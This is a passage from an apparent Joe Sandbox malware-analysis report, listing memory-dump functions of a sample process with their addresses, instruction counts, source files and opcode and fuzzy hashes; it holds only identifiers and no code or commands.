                                                                  • Opcode Fuzzy Hash: 01d3d99e1132004a82061ba50f0ba585345bf42250fc24ed8f2b699f2db8fa81
                                                                  • Instruction Fuzzy Hash: B8E02234508789CFEB02CB74C819AD87F7AAB06328F604248E0DD5F2C6CE649842CB82
                                                                  Function 05DBC030 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07de04a89519c69f223b35a07cf5c7cbd5a58166c92de2f0dab198325c618e62
                                                                  • Instruction ID: 56638cf15e78df0f3c4e6c538e58a01c5b215d7e0b6dd1155d92862b0dd4f4d6
                                                                  • Opcode Fuzzy Hash: 07de04a89519c69f223b35a07cf5c7cbd5a58166c92de2f0dab198325c618e62
                                                                  • Instruction Fuzzy Hash: 59F01574A043688BDB54CF66CC40BE9BBB2EB49304F00809AD549AB284CBB49A82CF50
                                                                  Function 06C45A60 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d2272325f0b865edf43732195d8b998964794e7971335952efa81ccc7e4f5f5
                                                                  • Instruction ID: c7c97f488173935f75bdef88e5a30c1b1785817dd5eaa7f6ade7539b5e73812a
                                                                  • Opcode Fuzzy Hash: 3d2272325f0b865edf43732195d8b998964794e7971335952efa81ccc7e4f5f5
                                                                  • Instruction Fuzzy Hash: D9E0E578D04208AFCB54DFA5D440AACBBB5AB48200F10C1AADC8863345D6369A52DF94
                                                                  Function 06C4DCF8 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6593baed1b72783611bbab17515cbc0ccb7c56f241cb2e9d978a77defc89aaa6
                                                                  • Instruction ID: 3ac174aa31f056b32d4707adb8081cb7f9e219b189dd4ca4e23710d2c668304e
                                                                  • Opcode Fuzzy Hash: 6593baed1b72783611bbab17515cbc0ccb7c56f241cb2e9d978a77defc89aaa6
                                                                  • Instruction Fuzzy Hash: BEE01A70D04208EFCB64EFA9D40429CBBF5EB49200F2081A9C808A3304D6356A41CF80
                                                                  Function 0704FE18 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60ef5bf60c8bf549da1c7850c3d1b6bbb448bf26f6670d3d9c2f985808e42069
                                                                  • Instruction ID: 6561517c21ebb51794b40beb0813eed8f3d1d230962e87202ced1d10738d28e5
                                                                  • Opcode Fuzzy Hash: 60ef5bf60c8bf549da1c7850c3d1b6bbb448bf26f6670d3d9c2f985808e42069
                                                                  • Instruction Fuzzy Hash: B4E086F4904209EBC714DFA5D84496DBFB8EB49305F24C2A9DC8857346C631AA43DB94
                                                                  Function 05DB75E0 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction ID: 0f2daf549fc3e078c1e3c8694b0896dc2ad270438b4a7eb92d4b5de7d0c70e50
                                                                  • Opcode Fuzzy Hash: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction Fuzzy Hash: 7CE04674D04208EFD750EFA8C9446ACBBF6EB48200F2085AACC4997784E6729B42CB80
                                                                  Function 05DB84F7 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bcaa4de7c88f86a44f5be4511d97c932a868722d72f35a776a0d55f38156b79
                                                                  • Instruction ID: f1e5c6f4ccefc2b6ed98e85623a472f7eaf78cabdf49794b6635f693dcabac13
                                                                  • Opcode Fuzzy Hash: 2bcaa4de7c88f86a44f5be4511d97c932a868722d72f35a776a0d55f38156b79
                                                                  • Instruction Fuzzy Hash: F5E0C274904608DFDF018F90C818AEE7BBBBB49308F108004E55A2B254C7788942EB80
                                                                  Function 05DBC7D0 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction ID: 25e9c46abb0966a1e12150e734db9e1ff94b5e98d297da1660fb7ab38bf8f624
                                                                  • Opcode Fuzzy Hash: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction Fuzzy Hash: 31E04F34914208EFD750DFA8C8446ACBBF9AB08200F2081AACC49D3344E7719E41CB80
                                                                  Function 05DB8732 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3f3043418b03d6811752c10669458b2369cae3a776ec648b4e3423bc343ad362
                                                                  • Instruction ID: aae5a09e11a37b0e84651da1a4173be328bfbb55d253af6aa24ca63b71a5d5f7
                                                                  • Opcode Fuzzy Hash: 3f3043418b03d6811752c10669458b2369cae3a776ec648b4e3423bc343ad362
                                                                  • Instruction Fuzzy Hash: F5E0DFB8814648CFDB018F54CC8D6E87BBBFB093A8F540000E49AAF360CA7589878B80
                                                                  Function 05DBF2C0 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 134f09477937a4b6c1c94245b6e5025fdbdce7864893b1af5d7418ac1794c564
                                                                  • Instruction ID: 147b147a578476f7d18295fef35d0039df6828a0cb7e1f9e654d1077d1e0e640
                                                                  • Opcode Fuzzy Hash: 134f09477937a4b6c1c94245b6e5025fdbdce7864893b1af5d7418ac1794c564
                                                                  • Instruction Fuzzy Hash: 3FE01A38D05208EBDB14DF99D8406ACFBB5EB48200F10C1AACC49A3345C6719A02CF80
                                                                  Function 05DB9CFB Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97c4ceb03111653f43ba25b763d64455b50b17bfd089ea33753c4abb7451c1f0
                                                                  • Instruction ID: 0cfe1bd9aa82a28217b5c185a672ac59a618e070e56cc2311d21919012b7c038
                                                                  • Opcode Fuzzy Hash: 97c4ceb03111653f43ba25b763d64455b50b17bfd089ea33753c4abb7451c1f0
                                                                  • Instruction Fuzzy Hash: 5EF0153180065EDBCF119F50C844ADEB772FF48308F108649E99937210CB31AA95DF80
                                                                  Function 05DBC970 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction ID: 9d4b811b32eaba4ca78a16fc66d8b56b69c0fd69c0f4c3de74600894f2daa030
                                                                  • Opcode Fuzzy Hash: b5cc010dffacdcee8532d80c661891756a7190ad734dea1e9b4137557bf53b57
                                                                  • Instruction Fuzzy Hash: BFE04F34914208EFDB60DFB8C8446ACFBF5AB08201F2081AACC49D3344D6729E41CB80
                                                                  Function 06C4F740 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ffd76d0383e0bad3f023d0c080b8a122e4fba8f71a2f5d874600176cf04ba41b
                                                                  • Instruction ID: ae1d7ccdd99124933ab645e6e7079ef40c967899c8c7f946d775c95e4f679a33
                                                                  • Opcode Fuzzy Hash: ffd76d0383e0bad3f023d0c080b8a122e4fba8f71a2f5d874600176cf04ba41b
                                                                  • Instruction Fuzzy Hash: 78E04634D04208EFCB90EFA8C8446ACBBF5AB48210F2085ADCC0CD3345E6329A42CB80
                                                                  Function 06C469CB Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: caac09d2a39dcbdab03c27b56f4d4da0905f5e4a31e3aa7c9717ca18fdff9b53
                                                                  • Instruction ID: 1437844add1a2c4b06c4f6ba70f9cd78a8ca0f518530ec390041a03965dc4ddd
                                                                  • Opcode Fuzzy Hash: caac09d2a39dcbdab03c27b56f4d4da0905f5e4a31e3aa7c9717ca18fdff9b53
                                                                  • Instruction Fuzzy Hash: 28F0F874D00208DFDB90DF56D484B9DBBF2FB06314F148496E408A3254C7755D84CF40
                                                                  Function 07049F50 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2338449816272a45ceb8a72cd28e6d9e81afc744813aa1d666b413b0b473199
                                                                  • Instruction ID: ff0506228b72c61736b5b32c59038d4fb0e11c79d8535fb79c9173075709b44b
                                                                  • Opcode Fuzzy Hash: c2338449816272a45ceb8a72cd28e6d9e81afc744813aa1d666b413b0b473199
                                                                  • Instruction Fuzzy Hash: BBE086B4904208EBC714DF94D84096DBBB9EB49300F10C2B9DC4423344C632AE52DB84
                                                                  Function 07048A58 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff225aab9c547df2bd2e2fb399d896bbb98707ff214b4b70a64513f24564977e
                                                                  • Instruction ID: 64f8b7e1d495ae98fd11421d1f0bba8f2783b133d1b391f4cedd6fb72641e830
                                                                  • Opcode Fuzzy Hash: ff225aab9c547df2bd2e2fb399d896bbb98707ff214b4b70a64513f24564977e
                                                                  • Instruction Fuzzy Hash: 84E04FB4D04208EFD714DFA5D4406ACFBF4EB49204F10C6EACC5853385D6759A12DF80
                                                                  Function 0134FAD8 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84f4e5c22a22f71864604f3c69a6080a8f215d412b47755b84defdeeb8c893eb
                                                                  • Instruction ID: ade33e73d8bc2986f82012ee2697bd00b9489ead80d896ca1ed77f15657441b8
                                                                  • Opcode Fuzzy Hash: 84f4e5c22a22f71864604f3c69a6080a8f215d412b47755b84defdeeb8c893eb
                                                                  • Instruction Fuzzy Hash: 33E09274D00208EFDB64EFA9D54869DBBF5EB48305F2081AAD848A3348E7796A45CF81
                                                                  Function 05DB7500 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64d5947f98c04f8a0c6786de9de9a321277436888a3f84b85e10d8705c38c58d
                                                                  • Instruction ID: be95abd7fe51e28df1bee9d695fe60715810a0984e969c231c8e2bdd2f8a1c4c
                                                                  • Opcode Fuzzy Hash: 64d5947f98c04f8a0c6786de9de9a321277436888a3f84b85e10d8705c38c58d
                                                                  • Instruction Fuzzy Hash: BEE0C2B2801208EFCB20EFB4980068E76F9EF46200F0045E6D505A3210EA310A009B92
                                                                  Function 05DB1538 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction ID: 135b5031b2044486bd168bc3bf95bc386b90fdd5947234941ef8d0cb5fa9f1a5
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: B7E0E674904108DBD714DF94D9556ACBBB5AB45305F108199CC4A17345C671DA42DB85
                                                                  Function 05DB2088 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction ID: 8404a9a331bfe95c3a54f22e3efaa949258d5ac4c265593015b4632f1652b81b
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: FDE0E678904108DBD714DF94D9455ADBB75AB49305F6081A9CC4A17345C6725A42CB85
                                                                  Function 05DB6070 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction ID: bfc48700ce9b287092100f343c9c90dcfc9f709e886b01edf90f77aa971fdf27
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: 88E0C234908208EBD714DFA4D8406ACBBB6EB49304F20C2DACC4923344C6729E42CF80
                                                                  Function 05DB09D0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction ID: ab0d4f388178a1f05d140e14210883039f6e5ef3555aad462d3ef8e6aa804f50
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: DCE0C234908208EBEB14DFA4D8456ADBBB6EB49300F24C1DACC4D23344C672AF06CB80
                                                                  Function 05DB6830 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction ID: 7e03cbc137bd7aeb6a6615bf331efbfb3b9b15e9a129f01b3b06ffde0e6d87fb
                                                                  • Opcode Fuzzy Hash: 354e6642c7ee8c46a1b881f8845c495c3cb90645e00dd15deac35d3edd842709
                                                                  • Instruction Fuzzy Hash: BFE01278D09208EBD714DFA4D9455ACBBB6EB49705F20C1DACC4927389C6729E42CB85
                                                                  Function 06C4DDA0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9466d860eda8376f13def444303cdad287bae9cffe40b329a32622045e85f2f6
                                                                  • Instruction ID: 0c01efbd345552485594d443e2bc7854af6db740f142cee811a64ce19988610e
                                                                  • Opcode Fuzzy Hash: 9466d860eda8376f13def444303cdad287bae9cffe40b329a32622045e85f2f6
                                                                  • Instruction Fuzzy Hash: 69E0EC74D05308EFD794EFB8D54979CBFF4AB08605F1045A9C849A3344E6715B44CF91
                                                                  Function 0704DEC0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e75d03ae3d812305fca51ded75fdad98702b0714cef46f9c360456953886e302
                                                                  • Instruction ID: c8791154d59b00a2018b6d8a493c09a1dfd625588f58d244adb81eb01091df4d
                                                                  • Opcode Fuzzy Hash: e75d03ae3d812305fca51ded75fdad98702b0714cef46f9c360456953886e302
                                                                  • Instruction Fuzzy Hash: BFE012B4A04208EBC718EFA5D94556CBBB5EB99305F20C6E9CC4827349CB329E42DB85
                                                                  Function 05DB7320 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f6f0daa51ad33da87789916981a6c71b3a952e73f203bf4b9b69ae673ce7e91f
                                                                  • Instruction ID: 42afc0645f17fcbe1dad81297cdfcf7aa26a20a7f27b4974c840a13bb34c9269
                                                                  • Opcode Fuzzy Hash: f6f0daa51ad33da87789916981a6c71b3a952e73f203bf4b9b69ae673ce7e91f
                                                                  • Instruction Fuzzy Hash: CEE0C234808208EFD720DFA4C8406ACBFB5EB49205F1082DECC8953345D6729A02CB80
                                                                  Function 05DBFA58 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95bc15b537bb347a550498310ef66f7edb2aa7417a7daa6d4dd4b2fe8e89b77d
                                                                  • Instruction ID: 2598dc01d864aebe7e3df70849b768d08a55d400b10a2c41de33bf67a0ac9a48
                                                                  • Opcode Fuzzy Hash: 95bc15b537bb347a550498310ef66f7edb2aa7417a7daa6d4dd4b2fe8e89b77d
                                                                  • Instruction Fuzzy Hash: A4E01274D04208EFD754DFA8D9456ACBBF5EB49205F1081DACC8957345E6729F42CF81
                                                                  Function 06C49921 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 32c03e1408495b2790ce3928f381b3a0e36c4ed9147f2d6274ca5983d8f8fc32
                                                                  • Instruction ID: 747336c5cc3f37301ddadebc94037f86ec6b9c30c7b33035b337b67990b69a76
                                                                  • Opcode Fuzzy Hash: 32c03e1408495b2790ce3928f381b3a0e36c4ed9147f2d6274ca5983d8f8fc32
                                                                  • Instruction Fuzzy Hash: CCF048B4A056288FCBA0DF28DD8469ABBF1BB89311F2050E9D58AA3244DB355E80CF05
                                                                  Function 0134F5C0 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6257e0f5062fb5003d18d597542848ae7eeb116fb23a0965ae548d9a730c88d3
                                                                  • Instruction ID: f589e430e0386627b77cb1b23225f915180f95232a9041a1c7e924c8436a9ecb
                                                                  • Opcode Fuzzy Hash: 6257e0f5062fb5003d18d597542848ae7eeb116fb23a0965ae548d9a730c88d3
                                                                  • Instruction Fuzzy Hash: 22E0EC70D11208EFD764EFBC954425DBBF5AB04205F6041E9D848A3244E6319A40CF81
                                                                  Function 05DB6D54 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 304341868c9fa703d5ada994093875ea51dec324644201a0005a4d97c13d3da8
                                                                  • Instruction ID: b84251e127e3ca8d9b3847c9f8885a6c65b704a34d4a3e1f67c7488a4a951c71
                                                                  • Opcode Fuzzy Hash: 304341868c9fa703d5ada994093875ea51dec324644201a0005a4d97c13d3da8
                                                                  • Instruction Fuzzy Hash: 0AE0B674D14258CBDB14CFA9E0416DDBBB2FB59304F50801BE466E7340CA749845CF45
                                                                  Function 013464E5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fe1c967570423de86569954f848775c108d2caed719d16c6c02e12e8766319b
                                                                  • Instruction ID: ac37f89afe6acb2bfe0b9c1d999bb68aaedee8148ce641ad345c5976ce6c13ae
                                                                  • Opcode Fuzzy Hash: 2fe1c967570423de86569954f848775c108d2caed719d16c6c02e12e8766319b
                                                                  • Instruction Fuzzy Hash: 51E0FE74905229CFCB79DF24D958699BBF1BB08305F90D4EAD88AA3645DF351A80DF80
                                                                  Function 06C4991C Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
